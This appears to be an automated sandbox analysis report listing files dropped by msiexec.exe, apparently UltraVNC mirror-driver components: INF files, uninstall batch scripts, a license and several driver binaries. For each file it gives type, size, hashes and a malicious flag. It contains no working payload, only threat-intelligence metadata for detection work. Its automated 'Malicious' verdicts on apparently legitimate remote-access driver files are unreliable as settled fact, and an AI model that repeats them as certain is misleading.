                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):26048
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.292871779652706
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:U2dFSGikkp4cE8WWk2lg0ZeE313MrnCbuSLwJiU:deeJlGMroJIiU
                                                                                                                                                                                                                                                                                                                                  MD5:867F3CA0E3A4B57F5BA7519B645AED66
                                                                                                                                                                                                                                                                                                                                  SHA1:837676FE5C7B62AFAA4D49E6AC51EDF948AD1757
                                                                                                                                                                                                                                                                                                                                  SHA-256:1A392E8731E4F01476C54FB4FD408F590D8530C34E3835081886A0056A91E502
                                                                                                                                                                                                                                                                                                                                  SHA-512:27E21584DC54D1996FDFEE2002027061A160E89BD3B7249C017D91900381102674D65282E9B623F002F392BBF8649F0092DE9CB46C70B739A42EE62A3753C8FF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2255
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3700497661675906
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ehVVpvnf4+BCs00c/9XSvFhb54y83WhJhdYpBBh22wlFTP/7bp:MJfJ00Si4yMyA7DwlFLB
                                                                                                                                                                                                                                                                                                                                  MD5:1B4F828FC21AA28C3CE863A31C1F9D48
                                                                                                                                                                                                                                                                                                                                  SHA1:96B8E2ED63F54BEB4E087712ADA7520C2379C5C4
                                                                                                                                                                                                                                                                                                                                  SHA-256:E7F85212D7708402910830576B0BD84873C24A1339CFD3EBBE5A2939127438D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:9CF0E701ADCBBE05652F623A34849910C657FA9536513835D18FD184FAAD47B62C28437237A78494B8E31F5E27C0BDDCD9D4CB5C5B4BEDC56EF0842553AB3064
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:; mv2.inf..;..; Installation inf for the Mirror graphics adapter...;..;....[Version]..Signature="$CHICAGO$"..Provider=%Cyberfox%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=04/11/2007,6.0.1.0..CatalogFile="mv2.cat"....[DestinationDirs]..DefaultDestDir = 11..mv2.Miniport = 12 ; drivers..mv2.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%Cyberfox% = stdMfg,NTamd64....[stdMfg.NTamd64]..%Winmv2% = mv2, mv_hook_display_driver2....;..; General installation section..;....[mv2]..CopyFiles=mv2.Miniport, mv2.Display....;..; File sections..;....[mv2.Miniport]..mv2.sys....[mv2.Display]..mv2.dll......;..; Service Installation..;....[mv2.Services]..AddService = mv2, 0x00000002, mv2_Service_Inst, mv2_EventLog_Inst....[mv2_Service_Inst]....ServiceType = 1 ; SERVICE_KERNEL_DRIVER..StartType = 1 ; SERVICE_SYSTEM_START..ErrorControl = 0 ; SERVICE_ERROR_IGNORE..LoadOrderGroup =
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.137352195821723
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:8hD6YJoIo6vyowJL/aoxhHoe068jSJUbueqycZ:8hD6YaD8YJLFHJ06dUb+BZ
                                                                                                                                                                                                                                                                                                                                  MD5:4B6B1EF53636E2C5A9EB9AF291970073
                                                                                                                                                                                                                                                                                                                                  SHA1:868C5A226293EEB37C513E106A80B9EE9A01684A
                                                                                                                                                                                                                                                                                                                                  SHA-256:25444A485A800E2609AD56179146DD24C41E3E56A10969037D4914BAA452DF53
                                                                                                                                                                                                                                                                                                                                  SHA-512:05B3D52E62ABB995B3EA4BEBE7C3D18354124772D97287BAAF4474ADBF9BD537AC258974C1C0B2EC1C7E3779D27D411FE74550FEA77A36D06A6D99FFD0628A7F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:6FMLVJ:uMLVJ
                                                                                                                                                                                                                                                                                                                                  MD5:903B157DCA56861C845179D4D1C5E930
                                                                                                                                                                                                                                                                                                                                  SHA1:E6B5ED1511F1F14F0436CA474FF457CB340E7C60
                                                                                                                                                                                                                                                                                                                                  SHA-256:8402E0C9189FA6EF6EF8E955606C5A20F880F1106EA5F81304E42A0864F078F8
                                                                                                                                                                                                                                                                                                                                  SHA-512:53F5BE22FD9B12FF9D084A65BE63BFA7A9B5489A5D95263343EE0DB3CE749B1B6D0999AC3CC34B23A4A970F3F02DD7ED1199269C12C8B59313FF58B225774006
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:setupdrv install
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (396), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.872615036376876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:0oSneisewrWYSaizLwupc5KEQbEE+H+s+joMyyeDbE7upgO8+jaUZN:2sQ1Rpc5DQo9+s+1yy7ipgl+NL
                                                                                                                                                                                                                                                                                                                                  MD5:624A16979822CA9E244602EF815E4FCF
                                                                                                                                                                                                                                                                                                                                  SHA1:FF39FD4A7EE12C5190144E2F28AB5D7DB2A3F435
                                                                                                                                                                                                                                                                                                                                  SHA-256:18D357C3792C89E9A8FC127E65A81BE919BEC7166E537ECA080478E0370E61C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:491EB3288F3753FB18DF1E1F634C07ECA7FF6970C6CE6778E0EB0C4FB1EC0A8E490C1273A0183CAC221DB8750B03FCDE5B7B03FBF8A98A5C43048523C7CE37C3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1. GRANT OF LICENSE:......RDV-Soft hereby grants Ultr@VNC Team -non-exclusive, royalty-free, worldwide, perpetual license to distribute, use the software product "Mirror driver" in binary form for their remote controle software. Ultr@VNC Team hereby grants the end-user the right to use and distribute the software product "Mirror Driver" with "Ultr@VNC"..... ....2. LIMITED WARRANTY......NO WARRANTY. To the maximum extent permitted by applicable law, We expressly disclaims any warranty for the SOFTWARE PRODUCT "Mirror Driver". The SOFTWARE PRODUCT "Mirror Driver" and any related documentation are provided "as is" without warranty of any kind, either express or implied, including, without limitation, the implied warranties of merchantability or fitness for a particular purpose...NO LIABILITY FOR CONSEQUENTIAL DAMAGES. To the maximum extent permitted by applicable law, in no event shall we be liable for any damages whatsoever (including, without limitation, damages for loss of business pro
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):90688
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.200545275172027
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:I/QY76jVjfCCHOLvctoA3eDDjEcUVzDOhtMRFS3CZiR3IeSkuH5ysQyMXq:I/QNjfCEoAOD0cUVWhmRLARnSDH5y1yv
                                                                                                                                                                                                                                                                                                                                  MD5:6C788D13DEDCD6EB9E022ACA8BD1C3FA
                                                                                                                                                                                                                                                                                                                                  SHA1:741A5342618A0AF7AC6E3F947FB3BC128477E237
                                                                                                                                                                                                                                                                                                                                  SHA-256:0BB050B230CA684DE7021D9B66303C71F408885163B20166E7047C223E0EE01E
                                                                                                                                                                                                                                                                                                                                  SHA-512:9CEEBC23EF82A302250291B0D3584F9CE9328DEA8850F49A3473B6B5392FCE4299AC0535A0F9AAF0A22047293DFD2AC70DF4002E21BF7B1BB1711E9984C9BC33
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):411
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977180725182127
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kCdGk3hd0E23B1047V1j47V1u471kgAq3Gn3C:/1RqXRC4R94RQ4dAqqy
                                                                                                                                                                                                                                                                                                                                  MD5:2203EE251159885EF20D6970F67529C3
                                                                                                                                                                                                                                                                                                                                  SHA1:D775009C08D7EC7F684FC7B657DDC7BCB7DA94C6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C3D0070A0EA5BB0708565930199C77E7DC4BFC31A6B368B2F8A7B0239E739304
                                                                                                                                                                                                                                                                                                                                  SHA-512:3A1BBF3F460DCDCDE1DE3D5F345973D1827EB717AB7FCA3C3DE5A12E324125EF94D7FFC34F664D5C1763790E3A4189F065DFCA4E0E7FB43E4BEC0DA32255E785
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\devcon64.exe remove mv_hook_display_driver2 >> inst.log....\utils\devcon64.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End....\utils\DIFxCmd64.exe /u driver\mv2.inf >> inst.log..:End....sc stop mv2 >> inst.log..sc delete mv2 >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8367
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.270789935373524
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+90+LRJoIo6vyowJL/aoxhHoe068jSJUbueqNb:eBRaD8YJLFHJ06dUb+Nb
                                                                                                                                                                                                                                                                                                                                  MD5:80D00FB5201EE5E66D8230B8440A7643
                                                                                                                                                                                                                                                                                                                                  SHA1:0DD971723322BB0EC8D7EF71D6389F839F6EBE30
                                                                                                                                                                                                                                                                                                                                  SHA-256:C17A1DE10DF4DF8A51E1EE7EDB209E6DEBF34285E327A7C669EF0E04E1BED72C
                                                                                                                                                                                                                                                                                                                                  SHA-512:C01F6AB36E2007E18DE27B46CB51BC8896AF5666FE18F39DADB0DC90B0DAAC2AB6580F31B0B15BD83D5453932A1299AE17E8DBA298D20B656945DEB0506F6AB5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23488
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.423731919049599
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:QvTfgigZKPBRDwvp5BY83HV8diQFHbsQaD8YJLFHJ06dUb+DQ:QLfpqKZRDMq6HV89HbsQSLwJiDQ
                                                                                                                                                                                                                                                                                                                                  MD5:55CB63E6661D7A911C74BF39986336AB
                                                                                                                                                                                                                                                                                                                                  SHA1:1F26A92347F58DC9616B611F1E8A29E0E6B94D67
                                                                                                                                                                                                                                                                                                                                  SHA-256:9C5E913DB4B4BE861EEC63C071FBCC6A3BC60A0D11949EC47251780508A83E25
                                                                                                                                                                                                                                                                                                                                  SHA-512:B31838612588A4CA9BB6B7D5DD0EABB69BF8FD41170FA71A0D7357D31BAFDF3075F0DE070160AFB58DAACEC5BB47EF34316E652DE9421B186F91BDCAA2BF58A2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2243
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.362010783542873
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ehVVpvnf4+BCs0j/9XSvFhb54y83WhJhdYpBBN22wlFTP/7bp:MJfJ0di4yMyAXDwlFLB
                                                                                                                                                                                                                                                                                                                                  MD5:AEA986639139A63559A39BE4A9986B39
                                                                                                                                                                                                                                                                                                                                  SHA1:87E84FA756B98F1437FF8F8DD9A2DCB6D0628515
                                                                                                                                                                                                                                                                                                                                  SHA-256:78A01CCC86628727E603A74BF008DBD95B465031EFA6FB52AB9496293E8470E1
                                                                                                                                                                                                                                                                                                                                  SHA-512:37E092646B88E45962737ED696C575F944E15BAD3884442A60D7DE427E8669AE1B3C578CE959D2D304A7668CC84F8F3E0C220A4988D4C15197228466456B3878
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:; mv2.inf..;..; Installation inf for the Mirror graphics adapter...;..;....[Version]..Signature="$CHICAGO$"..Provider=%Cyberfox%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=04/11/2007,6.0.1.0..CatalogFile="mv2.cat"....[DestinationDirs]..DefaultDestDir = 11..mv2.Miniport = 12 ; drivers..mv2.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%Cyberfox% = stdMfg....[stdMfg]..%Winmv2% = mv2, mv_hook_display_driver2....;..; General installation section..;....[mv2]..CopyFiles=mv2.Miniport, mv2.Display....;..; File sections..;....[mv2.Miniport]..mv2.sys....[mv2.Display]..mv2.dll......;..; Service Installation..;....[mv2.Services]..AddService = mv2, 0x00000002, mv2_Service_Inst, mv2_EventLog_Inst....[mv2_Service_Inst]....ServiceType = 1 ; SERVICE_KERNEL_DRIVER..StartType = 1 ; SERVICE_SYSTEM_START..ErrorControl = 0 ; SERVICE_ERROR_IGNORE..LoadOrderGroup = Video..ServiceBi
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.022711070794495
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+SniyJoIo6vyowJL/aoxhHoe068jSJUbueqrII:OyaD8YJLFHJ06dUb+J
                                                                                                                                                                                                                                                                                                                                  MD5:B435F95592AD8E6FC3BACD4A7E89B614
                                                                                                                                                                                                                                                                                                                                  SHA1:287FA71A499CB6AA7E806BB6106C7401CD504ACA
                                                                                                                                                                                                                                                                                                                                  SHA-256:331F200BCEA80E55743CE8CCF49B18785F70CAF21C13B15FBA9A3A9D32C6A46E
                                                                                                                                                                                                                                                                                                                                  SHA-512:53373208640AC22F23B4C56D9C9AC32E0837314E736D14FEAF2A571594886A3D6EF42B875980D39FBE9103C101CDAED43740EB026FFFA6019503E39A85E38086
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:6FMLVJ:uMLVJ
                                                                                                                                                                                                                                                                                                                                  MD5:903B157DCA56861C845179D4D1C5E930
                                                                                                                                                                                                                                                                                                                                  SHA1:E6B5ED1511F1F14F0436CA474FF457CB340E7C60
                                                                                                                                                                                                                                                                                                                                  SHA-256:8402E0C9189FA6EF6EF8E955606C5A20F880F1106EA5F81304E42A0864F078F8
                                                                                                                                                                                                                                                                                                                                  SHA-512:53F5BE22FD9B12FF9D084A65BE63BFA7A9B5489A5D95263343EE0DB3CE749B1B6D0999AC3CC34B23A4A970F3F02DD7ED1199269C12C8B59313FF58B225774006
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:setupdrv install
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (396), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.872615036376876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:0oSneisewrWYSaizLwupc5KEQbEE+H+s+joMyyeDbE7upgO8+jaUZN:2sQ1Rpc5DQo9+s+1yy7ipgl+NL
                                                                                                                                                                                                                                                                                                                                  MD5:624A16979822CA9E244602EF815E4FCF
                                                                                                                                                                                                                                                                                                                                  SHA1:FF39FD4A7EE12C5190144E2F28AB5D7DB2A3F435
                                                                                                                                                                                                                                                                                                                                  SHA-256:18D357C3792C89E9A8FC127E65A81BE919BEC7166E537ECA080478E0370E61C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:491EB3288F3753FB18DF1E1F634C07ECA7FF6970C6CE6778E0EB0C4FB1EC0A8E490C1273A0183CAC221DB8750B03FCDE5B7B03FBF8A98A5C43048523C7CE37C3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1. GRANT OF LICENSE:......RDV-Soft hereby grants Ultr@VNC Team -non-exclusive, royalty-free, worldwide, perpetual license to distribute, use the software product "Mirror driver" in binary form for their remote controle software. Ultr@VNC Team hereby grants the end-user the right to use and distribute the software product "Mirror Driver" with "Ultr@VNC"..... ....2. LIMITED WARRANTY......NO WARRANTY. To the maximum extent permitted by applicable law, We expressly disclaims any warranty for the SOFTWARE PRODUCT "Mirror Driver". The SOFTWARE PRODUCT "Mirror Driver" and any related documentation are provided "as is" without warranty of any kind, either express or implied, including, without limitation, the implied warranties of merchantability or fitness for a particular purpose...NO LIABILITY FOR CONSEQUENTIAL DAMAGES. To the maximum extent permitted by applicable law, in no event shall we be liable for any damages whatsoever (including, without limitation, damages for loss of business pro
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.9219061141523825
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:1zCCrWvSRU7VEBmGDnw29Gz07X83JlcytyCpw:1zCCrM7Uio83JljtyIw
                                                                                                                                                                                                                                                                                                                                  MD5:50F6A9509729A6D8D97E29AD259C6A1E
                                                                                                                                                                                                                                                                                                                                  SHA1:1AEADFC64CD4D6B9D878F93999A4D571936CCA91
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8B3049C278B7E3FE2CFE4D84096A292CC14557EBCC02B8998EB14C83289EB8F
                                                                                                                                                                                                                                                                                                                                  SHA-512:71660BEE4D58074B05538DA18F905CBFAF1567C60AA02F7C979571F3D21AC2AD56F19B3B7FEB2430686302222932CB901B0B895C16076EF1963CC93C94311769
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):405
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.932556842608647
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kCdgk3hdyE23B1047V1j47V1u47jkgAq3Gn3C:/jR8XRC4R94RQ43Aqqy
                                                                                                                                                                                                                                                                                                                                  MD5:00A98380A84308DFEDB409827DB9C916
                                                                                                                                                                                                                                                                                                                                  SHA1:F31EC578108616125450187C709B6E133425BC25
                                                                                                                                                                                                                                                                                                                                  SHA-256:948C84A52F8847798150629B396E29857C0C7EB77550276A000E02B2B9C85A4E
                                                                                                                                                                                                                                                                                                                                  SHA-512:73AFAEB0394B470102A05D6E7F1195E60BEFE5469241C5ED182032AC80E54196945E7E9AA9AC2391DC13528E06F3D6C165C4083ECFE6B6F07A1E8F2E30AA5A8E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\devcon.exe remove mv_hook_display_driver2 >> inst.log....\utils\devcon.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End....\utils\DIFxCmd.exe /u driver\mv2.inf >> inst.log..:End....sc stop mv2 >> inst.log..sc delete mv2 >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8403
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.26515273733877
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:VafwaRJoIo6vyowJL/aoxhHoe068jSJUbueqO0:VQRaD8YJLFHJ06dUb+O0
                                                                                                                                                                                                                                                                                                                                  MD5:9B3AB5B97500F2C39C75EA2910BC6420
                                                                                                                                                                                                                                                                                                                                  SHA1:42267EA620E0EF5B0F4DBF25B705F1B3C4D03649
                                                                                                                                                                                                                                                                                                                                  SHA-256:32557B63B75CE1DBB761C22092E130561FE6B156CD1D0F96E809E8D0A32E89A6
                                                                                                                                                                                                                                                                                                                                  SHA-512:BFEBCC8BA47E7E0F7FA6218E2A057C3ADD8C570B839ACA3F159495024028A9F6408143FB7A34F2EAD66278401898150A497339BEF3E671A3212055EC73056009
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25536
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.314384276589044
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:jdxcojc4oPxNtS4v28b3pnd6DABnOSLwJiz:jdj9oPxjNv2YnPdpIiz
                                                                                                                                                                                                                                                                                                                                  MD5:52E972E497645851FA910787CC2050E0
                                                                                                                                                                                                                                                                                                                                  SHA1:1CE9A93996DFC5F24DF8CAD16E15555BE368B956
                                                                                                                                                                                                                                                                                                                                  SHA-256:B0C07A2912B4EC67CA8A37B890DB33A62CC0DB3A733CD6D146FF6F865D6E4B88
                                                                                                                                                                                                                                                                                                                                  SHA-512:4CADF2BFA9056A1756BB79C4EB2842E8A9A132544305EAB0F1433AF2C890B24DA3614E5E241A86358CF47FBF7F0A783102850346CAB2FA04B1AEDC9B81C79E94
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2255
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3700497661675906
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ehVVpvnf4+BCs00c/9XSvFhb54y83WhJhdYpBBh22wlFTP/7bp:MJfJ00Si4yMyA7DwlFLB
                                                                                                                                                                                                                                                                                                                                  MD5:1B4F828FC21AA28C3CE863A31C1F9D48
                                                                                                                                                                                                                                                                                                                                  SHA1:96B8E2ED63F54BEB4E087712ADA7520C2379C5C4
                                                                                                                                                                                                                                                                                                                                  SHA-256:E7F85212D7708402910830576B0BD84873C24A1339CFD3EBBE5A2939127438D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:9CF0E701ADCBBE05652F623A34849910C657FA9536513835D18FD184FAAD47B62C28437237A78494B8E31F5E27C0BDDCD9D4CB5C5B4BEDC56EF0842553AB3064
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:; mv2.inf..;..; Installation inf for the Mirror graphics adapter...;..;....[Version]..Signature="$CHICAGO$"..Provider=%Cyberfox%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=04/11/2007,6.0.1.0..CatalogFile="mv2.cat"....[DestinationDirs]..DefaultDestDir = 11..mv2.Miniport = 12 ; drivers..mv2.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%Cyberfox% = stdMfg,NTamd64....[stdMfg.NTamd64]..%Winmv2% = mv2, mv_hook_display_driver2....;..; General installation section..;....[mv2]..CopyFiles=mv2.Miniport, mv2.Display....;..; File sections..;....[mv2.Miniport]..mv2.sys....[mv2.Display]..mv2.dll......;..; Service Installation..;....[mv2.Services]..AddService = mv2, 0x00000002, mv2_Service_Inst, mv2_EventLog_Inst....[mv2_Service_Inst]....ServiceType = 1 ; SERVICE_KERNEL_DRIVER..StartType = 1 ; SERVICE_SYSTEM_START..ErrorControl = 0 ; SERVICE_ERROR_IGNORE..LoadOrderGroup =
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.137468737457105
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:8CvhDWQJoIo6vyowJL/aoxhHoe068jSJUbueqEQ:hhDWQaD8YJLFHJ06dUb+EQ
                                                                                                                                                                                                                                                                                                                                  MD5:0469611E7DC0A882D123DC89FE386C01
